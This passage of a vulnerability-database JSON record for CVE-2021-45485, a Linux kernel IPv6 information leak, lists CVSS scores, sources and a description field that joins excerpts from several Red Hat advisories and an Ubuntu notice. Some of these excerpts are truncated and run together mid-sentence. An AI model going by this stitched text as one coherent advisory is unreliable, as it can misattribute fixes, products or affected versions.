"id": "169695"
},
{
"db": "PACKETSTORM",
"id": "169997"
}
],
"trust": 0.6
},
"cve": "CVE-2021-45485",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2021-45485",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-409116",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2021-45485",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-45485",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-45485",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2021-45485",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202112-2265",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-409116",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-45485",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-409116"
},
{
"db": "VULMON",
"id": "CVE-2021-45485"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2265"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
},
{
"db": "NVD",
"id": "CVE-2021-45485"
}
]
},
"description": {
"_id": null,
"data": "In the IPv6 implementation in the Linux kernel before 5.13.3, net/ipv6/output_core.c has an information leak because of certain use of a hash table which, although big, doesn\u0027t properly consider that IPv6-based attackers can typically choose among many IPv6 source addresses. Linux Kernel Exists in the use of cryptographic algorithms.Information may be obtained. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.4.5 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. \nSee the following\nRelease Notes documentation, which will be updated shortly for this\nrelease, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/\n\nSecurity fixes:\n\n* golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)\n\n* nconf: Prototype pollution in memory store (CVE-2022-21803)\n\n* golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n(CVE-2022-23806)\n\n* nats-server: misusing the \"dynamically provisioned sandbox accounts\"\nfeature authenticated user can obtain the privileges of the System account\n(CVE-2022-24450)\n\n* Moment.js: Path traversal in moment.locale (CVE-2022-24785)\n\n* dset: Prototype Pollution in dset (CVE-2022-25645)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* go-getter: writes SSH credentials into logfile, exposing sensitive\ncredentials to local uses (CVE-2022-29810)\n\nBug fixes:\n\n* Trying to create a new cluster on vSphere and no feedback, stuck in\n\"creating\" (BZ# 1937078)\n\n* Wrong message is displayed when GRC fails to connect to an Ansible 
Tower\n(BZ# 2051752)\n\n* multicluster_operators_hub_subscription issues due to /tmp usage (BZ#\n2052702)\n\n* Create Cluster, Worker Pool 2 zones do not load options that relate to\nthe selected Region field (BZ# 2054954)\n\n* Changing the multiclusterhub name other than the default name keeps the\nversion in the web console loading (BZ# 2059822)\n\n* search-redisgraph-0 generating massive amount of logs after 2.4.2 upgrade\n(BZ# 2065318)\n\n* Uninstall pod crashed when destroying Azure Gov cluster in ACM (BZ#\n2073562)\n\n* Deprovisioned clusters not filtered out by discovery controller (BZ#\n2075594)\n\n* When deleting a secret for a Helm application, duplicate errors show up\nin topology (BZ# 2075675)\n\n* Changing existing placement rules does not change YAML file Regression\n(BZ# 2075724)\n\n* Editing Helm Argo Applications does not Prune Old Resources (BZ# 2079906)\n\n* Failed to delete the requested resource [404] error appears after\nsubscription is deleted and its placement rule is used in the second\nsubscription (BZ# 2080713)\n\n* Typo in the logs when Deployable is updated in the subscription namespace\n(BZ# 2080960)\n\n* After Argo App Sets are created in an Upgraded Environment, the Clusters\ncolumn does not indicate the clusters (BZ# 2080716)\n\n* RHACM 2.4.5 images (BZ# 2081438)\n\n* Performance issue to get secret in claim-controller (BZ# 2081908)\n\n* Failed to provision openshift 4.10 on bare metal (BZ# 2094109)\n\n3. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1937078 - Trying to create a new cluster on vSphere and no feedback, stuck in \"creating\"\n2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic\n2051752 - Wrong message is displayed when GRC fails to connect to an ansible tower\n2052573 - CVE-2022-24450 nats-server: misusing the \"dynamically provisioned sandbox accounts\" feature authenticated user can obtain the privileges of the System account\n2052702 - multicluster_operators_hub_subscription issues due to /tmp usage\n2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n2054954 - Create Cluster, Worker Pool 2 zones do not load options that relate to the selected Region field\n2059822 - Changing the multiclusterhub name other than the default name keeps the version in the web console loading. \n2065318 - search-redisgraph-0 generating massive amount of logs after 2.4.2 upgrade\n2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale\n2073562 - Uninstall pod crashed when destroying Azure Gov cluster in ACM\n2074689 - CVE-2022-21803 nconf: Prototype pollution in memory store\n2075594 - Deprovisioned clusters not filtered out by discovery controller\n2075675 - When deleting a secret for a Helm application, duplicate errors show up in topology\n2075724 - Changing existing placement rules does not change YAML file\n2079906 - Editing Helm Argo Applications does not Prune Old Resources\n2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses\n2080713 - Failed to delete the requested resource [404] error appears after subscription is deleted and it\u0027s placement rule is used in the second subscription [Upgrade]\n2080716 - After Argo App Sets are created in an Upgraded Environment, the Clusters column does not indicate the clusters\n2080847 - CVE-2022-25645 dset: Prototype Pollution in dset\n2080960 - Typo in the logs when 
Deployable is updated in the subscription namespace\n2081438 - RHACM 2.4.5 images\n2081908 - Performance issue to get secret in claim-controller\n2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group\n2094109 - Failed to provision openshift 4.10 on bare metal\n\n5. See the following Release Notes documentation, which will be updated\nshortly for this release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/\n\nSecurity fixes: \n\n* node-fetch: exposure of sensitive information to an unauthorized actor\n(CVE-2022-0235)\n\n* follow-redirects: Exposure of Sensitive Information via Authorization\nHeader leak (CVE-2022-0536)\n\n* nconf: Prototype pollution in memory store (CVE-2022-21803)\n\n* golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n(CVE-2022-23806)\n\n* Moment.js: Path traversal in moment.locale (CVE-2022-24785)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* go-getter: writes SSH credentials into logfile, exposing sensitive\ncredentials to local uses (CVE-2022-29810)\n\nBug fixes:\n\n* RHACM 2.3.11 images (BZ# 2082087)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak\n2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale\n2074689 - CVE-2022-21803 nconf: Prototype pollution in memory store\n2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses\n2082087 - RHACM 2.3.11 images\n2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group\n\n5. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: kernel-rt security and bug fix update\nAdvisory ID: RHSA-2022:1975-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:1975\nIssue date: 2022-05-10\nCVE Names: CVE-2020-0404 CVE-2020-13974 CVE-2020-27820 \n CVE-2021-0941 CVE-2021-3612 CVE-2021-3669 \n CVE-2021-3743 CVE-2021-3744 CVE-2021-3752 \n CVE-2021-3759 CVE-2021-3764 CVE-2021-3772 \n CVE-2021-3773 CVE-2021-4002 CVE-2021-4037 \n CVE-2021-4083 CVE-2021-4157 CVE-2021-4197 \n CVE-2021-4203 CVE-2021-20322 CVE-2021-26401 \n CVE-2021-29154 CVE-2021-37159 CVE-2021-41864 \n CVE-2021-42739 CVE-2021-43389 CVE-2021-43976 \n CVE-2021-44733 CVE-2021-45485 CVE-2021-45486 \n CVE-2022-0001 CVE-2022-0002 CVE-2022-0286 \n CVE-2022-0322 CVE-2022-1011 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel-rt is now available for Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Real Time (v. 8) - x86_64\nRed Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. 
\n\nSecurity Fix(es):\n\n* kernel: fget: check that the fd still exists after getting a ref to it\n(CVE-2021-4083)\n\n* kernel: avoid cyclic entity chains due to malformed USB descriptors\n(CVE-2020-0404)\n\n* kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c\n(CVE-2020-13974)\n\n* kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a\nuse-after-free (CVE-2021-0941)\n\n* kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP()\n(CVE-2021-3612)\n\n* kernel: reading /proc/sysvipc/shm does not scale with large shared memory\nsegment counts (CVE-2021-3669)\n\n* kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c\n(CVE-2021-3743)\n\n* kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd()\n(CVE-2021-3744)\n\n* kernel: possible use-after-free in bluetooth module (CVE-2021-3752)\n\n* kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg\nlimits and DoS attacks (CVE-2021-3759)\n\n* kernel: DoS in ccp_run_aes_gcm_cmd() function (CVE-2021-3764)\n\n* kernel: sctp: Invalid chunks may be used to remotely remove existing\nassociations (CVE-2021-3772)\n\n* kernel: lack of port sanity checking in natd and netfilter leads to\nexploit of OpenVPN clients (CVE-2021-3773)\n\n* kernel: possible leak or coruption of data residing on hugetlbfs\n(CVE-2021-4002)\n\n* kernel: security regression for CVE-2018-13405 (CVE-2021-4037)\n\n* kernel: Buffer overwrite in decode_nfs_fh function (CVE-2021-4157)\n\n* kernel: cgroup: Use open-time creds and namespace for migration perm\nchecks (CVE-2021-4197)\n\n* kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses\n(CVE-2021-4203)\n\n* kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed\npackets replies (CVE-2021-20322)\n\n* hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 (CVE-2021-26401)\n\n* kernel: Local privilege escalation due to incorrect BPF JIT branch\ndisplacement computation (CVE-2021-29154)\n\n* kernel: 
use-after-free in hso_free_net_device() in drivers/net/usb/hso.c\n(CVE-2021-37159)\n\n* kernel: eBPF multiplication integer overflow in\nprealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to\nout-of-bounds write (CVE-2021-41864)\n\n* kernel: Heap buffer overflow in firedtv driver (CVE-2021-42739)\n\n* kernel: an array-index-out-bounds in detach_capi_ctr in\ndrivers/isdn/capi/kcapi.c (CVE-2021-43389)\n\n* kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c\nallows an attacker to cause DoS via crafted USB device (CVE-2021-43976)\n\n* kernel: use-after-free in the TEE subsystem (CVE-2021-44733)\n\n* kernel: information leak in the IPv6 implementation (CVE-2021-45485)\n\n* kernel: information leak in the IPv4 implementation (CVE-2021-45486)\n\n* hw: cpu: intel: Branch History Injection (BHI) (CVE-2022-0001)\n\n* hw: cpu: intel: Intra-Mode BTI (CVE-2022-0002)\n\n* kernel: Local denial of service in bond_ipsec_add_sa (CVE-2022-0286)\n\n* kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c\n(CVE-2022-0322)\n\n* kernel: FUSE allows UAF reads of write() buffers, allowing theft of\n(partial) /etc/shadow hashes (CVE-2022-1011)\n\n* kernel: use-after-free in nouveau kernel module (CVE-2020-27820)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.6 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1901726 - CVE-2020-27820 kernel: use-after-free in nouveau kernel module\n1903578 - kernnel-rt-debug: do not call blocking ops when !TASK_RUNNING; state=1 set at [\u003c0000000050e86018\u003e] handle_userfault+0x530/0x1820\n1905749 - kernel-rt-debug: BUG: sleeping function called from invalid context at kernel/locking/rtmutex.c:968\n1919791 - CVE-2020-0404 kernel: avoid cyclic entity chains due to malformed USB descriptors\n1946684 - CVE-2021-29154 kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation\n1951739 - CVE-2021-42739 kernel: Heap buffer overflow in firedtv driver\n1974079 - CVE-2021-3612 kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP()\n1985353 - CVE-2021-37159 kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c\n1986473 - CVE-2021-3669 kernel: reading /proc/sysvipc/shm does not scale with large shared memory segment counts\n1997467 - CVE-2021-3764 kernel: DoS in ccp_run_aes_gcm_cmd() function\n1997961 - CVE-2021-3743 kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c\n1999544 - CVE-2021-3752 kernel: possible use-after-free in bluetooth module\n1999675 - CVE-2021-3759 kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg limits and DoS attacks\n2000627 - CVE-2021-3744 kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd()\n2000694 - CVE-2021-3772 kernel: sctp: Invalid chunks may be used to remotely remove existing associations\n2004949 - CVE-2021-3773 kernel: lack of port sanity checking in natd and netfilter leads to exploit of OpenVPN clients\n2010463 - CVE-2021-41864 kernel: eBPF multiplication integer overflow in prealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to out-of-bounds write\n2013180 - CVE-2021-43389 kernel: an array-index-out-bounds in detach_capi_ctr in drivers/isdn/capi/kcapi.c\n2014230 - CVE-2021-20322 kernel: new DNS Cache Poisoning Attack based on ICMP fragment 
needed packets replies\n2016169 - CVE-2020-13974 kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c\n2018205 - CVE-2021-0941 kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a use-after-free\n2025003 - CVE-2021-43976 kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c allows an attacker to cause DoS via crafted USB device\n2025726 - CVE-2021-4002 kernel: possible leak or coruption of data residing on hugetlbfs\n2027239 - CVE-2021-4037 kernel: security regression for CVE-2018-13405\n2029923 - CVE-2021-4083 kernel: fget: check that the fd still exists after getting a ref to it\n2030747 - CVE-2021-44733 kernel: use-after-free in the TEE subsystem\n2034342 - CVE-2021-4157 kernel: Buffer overwrite in decode_nfs_fh function\n2035652 - CVE-2021-4197 kernel: cgroup: Use open-time creds and namespace for migration perm checks\n2036934 - CVE-2021-4203 kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses\n2037019 - CVE-2022-0286 kernel: Local denial of service in bond_ipsec_add_sa\n2039911 - CVE-2021-45485 kernel: information leak in the IPv6 implementation\n2039914 - CVE-2021-45486 kernel: information leak in the IPv4 implementation\n2042822 - CVE-2022-0322 kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c\n2061700 - CVE-2021-26401 hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715\n2061712 - CVE-2022-0001 hw: cpu: intel: Branch History Injection (BHI)\n2061721 - CVE-2022-0002 hw: cpu: intel: Intra-Mode BTI\n2064855 - CVE-2022-1011 kernel: FUSE allows UAF reads of write() buffers, allowing theft of (partial) /etc/shadow hashes\n\n6. Package List:\n\nRed Hat Enterprise Linux Real Time for NFV (v. 
8):\n\nSource:\nkernel-rt-4.18.0-372.9.1.rt7.166.el8.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-kvm-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-kvm-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\n\nRed Hat Enterprise Linux Real Time (v. 8):\n\nSource:\nkernel-rt-4.18.0-372.9.1.rt7.166.el8.src.rpm\n\nx86_64:\nkernel-rt-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debug-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\nkernel-rt-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. 
Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYnqRVtzjgjWX9erEAQjwiA//R/ZVJ7xroUR7Uf1az+8xZqs4OZQADIUc\n/92cDd6MRyzkvwQx5u7JmD5E6KbRf3NGfDsuoC0jVJJJcp8GT0tWkxPIjCi2RNbI\n/9nlbkfp0eQqRGmpL753W/7sfzAnbiOeP47rr+lJU24OBDcbrZn5X3Ex0EdzcdeD\nfmVnAxB8bsXyZwcnX9m6mVlBxY+fm6SC78O+/rPzVUHl5NhQASqi0sYSwydyqZvG\na/9p5gXd9nnyV7NtJj58pS7brxQFq4RcM5VhTjix3a/ZaZEwT+nDMj3+RXXwUhGe\nHJ6AdJoNI19huMXtn/fYhomb/LIHQos+kHQrBbJ+KmaFE4DD08Uv2uHSyeEe1ksT\noUwcGcIbSta6LBNO60Lh0XVj6FgFWNnNsAGX27nxCHfzDjuJ3U4Tyh8gL+ID2K1t\n3nwoQl5gxUokFS0sUIuD0pj2LFW1vg2E2pMcbzPDqFwj0MXn5DpTb4qeuiRWzA05\ns+upi3Cd6XmRNKPH8DDOrGNGW0dJqJtuXhUmziZjKPMJK5Ygnhoc+3hYG/EJzGiq\nS/VHXR5hnJ+RAPz2U8rETfCW2Dvz7lCUh5rJGg/8f8MCyAMCPpFqXbkNvpt3BIKy\n2SLBhh0Mci1fprA35q2eNCjduntja3oxnVx+YAKPM30hzE7ejwHFEZHPGOdKB0q/\naHIZwOKDLaE=\n=hqV1\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Summary:\n\nThe Migration Toolkit for Containers (MTC) 1.6.5 is now available. Description:\n\nThe Migration Toolkit for Containers (MTC) enables you to migrate\nKubernetes resources, persistent volume data, and internal container images\nbetween OpenShift Container Platform clusters, using the MTC web console or\nthe Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):\n\n2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196)\n2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes\n2057579 - [MTC UI] Cancel button on ?Migrations? 
page does not disappear when migration gets Failed/Succeeded with warnings\n2072311 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x\n2074044 - [MTC] Rsync pods are not running as privileged\n2074553 - Upstream Hook Runner image requires arguments be in a different order\n\n5. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.10.39. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHBA-2022:7210\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html\n\nSecurity Fix(es):\n\n* go-getter: command injection vulnerability (CVE-2022-26945)\n* go-getter: unsafe download (issue 1 of 3) (CVE-2022-30321)\n* go-getter: unsafe download (issue 2 of 3) (CVE-2022-30322)\n* go-getter: unsafe download (issue 3 of 3) (CVE-2022-30323)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s)\nlisted in the References section. 
\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.39-x86_64\n\nThe image digest is\nsha256:59d7ac85da072fea542d7c43498e764c72933e306117a105eac7bd5dda4e6bbe\n\n(For s390x architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.39-s390x\n\nThe image digest is\nsha256:6b243bd6078b0a0e570c7bdf88a345f0c145009f929844f4c8ceb4dc828c0a7a\n\n(For ppc64le architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.39-ppc64le\n\nThe image digest is\nsha256:e28554de454e8955fe72cd124fa9893e2c1761d39452e05610ec062d637baf2e\n\n(For aarch64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.10.39-aarch64\n\nThe image digest is\nsha256:cc0860b33c3631ee3624cc280d796fb01ce8f802c5d7ecde8ef4010aad941dc0\n\nAll OpenShift Container Platform 4.10 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html\n\n3. Solution:\n\nFor OpenShift Container Platform 4.10 see the following documentation,\nwhich will be updated shortly for this release, for important instructions\non how to upgrade your cluster and fully apply this asynchronous errata\nupdate:\n\nhttps://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html\n\n4. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3)\n2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3)\n2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3)\n2092928 - CVE-2022-26945 go-getter: command injection vulnerability\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nOCPBUGS-1538 - Make northd probe interval default to 10 seconds\nOCPBUGS-1696 - All Nodes overview in console are showing \"Something went wrong\"\nOCPBUGS-2162 - Facing issue while configuring egress IP pool in OCP cluster which uses STS\nOCPBUGS-2171 - [4.10] cri-o should report the stage of container and pod creation it\u0027s stuck at\nOCPBUGS-2196 - Symptom Detection.Undiagnosed panic detected in pod\nOCPBUGS-2208 - [4.10] Dual stack cluster fails on installation when multi-path routing entries exist\nOCPBUGS-2448 - Downward API (annotations) is missing PCI information when using the tuning metaPlugin on SR-IOV Networks\nOCPBUGS-2464 - Add unit-test and gofmt support for ovn-kubernetes\nOCPBUGS-2523 - e2e tests: Installs Red Hat Integration - 3scale operator test is failing due to change of Operator name\nOCPBUGS-2546 - Remove policy/v1beta1 in 4.10 and later\nOCPBUGS-2553 - [release-4.10] member loses rights after some other user login in openid / group sync\nOCPBUGS-2607 - [release-4.10] go.mod should beworking with golang-1.17 and golang-1.18\nOCPBUGS-2622 - CI: Backend unit tests fails because devfile registry was updated (mock response)\nOCPBUGS-2628 - Worker creation fails within provider networks (as primary and secondary)\nOCPBUGS-450 - KubeDaemonSetRolloutStuck alert using incorrect metric in 4.9 and 4.10\nOCPBUGS-691 - [2112237] [ Cluster storage Operator 4.x(10/11) ] DefaultStorageClassController report fake message \"No default StorageClass for this platform\" on Alicloud, IBM, Nutanix\n\n6. 
Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n2094982 - CVE-2022-1996 go-restful: Authorization Bypass Through User-Controlled Key\n2130218 - 4.9.7 containers\n\n5. ==========================================================================\nUbuntu Security Notice USN-5299-1\nFebruary 22, 2022\n\nlinux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 ESM\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. A physically proximate\nattacker could possibly use this issue to inject packets or exfiltrate\nselected fragments. (CVE-2020-26147)\n\nIt was discovered that the bluetooth subsystem in the Linux kernel did not\nproperly perform access control. An authenticated attacker could possibly\nuse this to expose sensitive information. (CVE-2020-26558, CVE-2021-0129)\n\nIt was discovered that the RPA PCI Hotplug driver implementation in the\nLinux kernel did not properly handle device name writes via sysfs, leading\nto a buffer overflow. A privileged attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33034)\n\nNorbert Slusarek discovered that the CAN broadcast manger (bcm) protocol\nimplementation in the Linux kernel did not properly initialize memory in\nsome situations. A local attacker could use this to expose sensitive\ninformation (kernel memory). 
